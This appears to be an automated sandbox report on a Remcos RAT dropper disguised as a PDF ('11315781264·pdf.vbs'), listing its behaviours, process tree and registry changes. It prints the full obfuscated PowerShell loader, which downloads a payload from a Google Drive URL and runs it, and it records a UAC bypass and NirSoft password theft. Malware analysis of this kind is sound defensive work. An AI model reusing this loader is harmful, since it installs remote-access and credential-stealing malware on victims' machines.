Malware Analysis Report

2024-12-01 03:11

Sample ID 241111-tqsaks1gje
Target 11315781264·pdf.vbs
SHA256 2a3615e8c977f2a9411c9fef294c7dd53986ce084579340b55977544fc94f143
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2a3615e8c977f2a9411c9fef294c7dd53986ce084579340b55977544fc94f143

Threat Level: Known bad

The file 11315781264·pdf.vbs was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

Remcos

UAC bypass

Remcos family

Detected Nirsoft tools

NirSoft MailPassView

NirSoft WebBrowserPassView

Blocklisted process makes network request

Uses browser remote debugging

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies registry key

Modifies registry class

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 16:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 16:16

Reported

2024-11-11 16:18

Platform

win7-20240903-en

Max time kernel

117s

Max time network

117s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab86ED.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/316-20-0x000007FEF572E000-0x000007FEF572F000-memory.dmp

memory/316-21-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/316-24-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/316-23-0x0000000001D60000-0x0000000001D68000-memory.dmp

memory/316-22-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/316-25-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/316-26-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/316-27-0x000007FEF572E000-0x000007FEF572F000-memory.dmp

memory/316-28-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/316-29-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/316-30-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/316-31-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 16:16

Reported

2024-11-11 16:18

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2736 set thread context of 3520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 set thread context of 3580 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 set thread context of 4028 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4272 wrote to memory of 1644 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4272 wrote to memory of 1644 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1372 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1372 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1372 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 1372 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 1716 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1716 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2736 wrote to memory of 1716 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 1716 wrote to memory of 1560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1716 wrote to memory of 1560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1716 wrote to memory of 1560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2736 wrote to memory of 5044 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2736 wrote to memory of 5044 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 448 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 448 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2736 wrote to memory of 3520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 3520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 3520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 3520 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 3580 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 3580 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 3580 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 3580 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 4028 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 4028 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 4028 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2736 wrote to memory of 4028 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
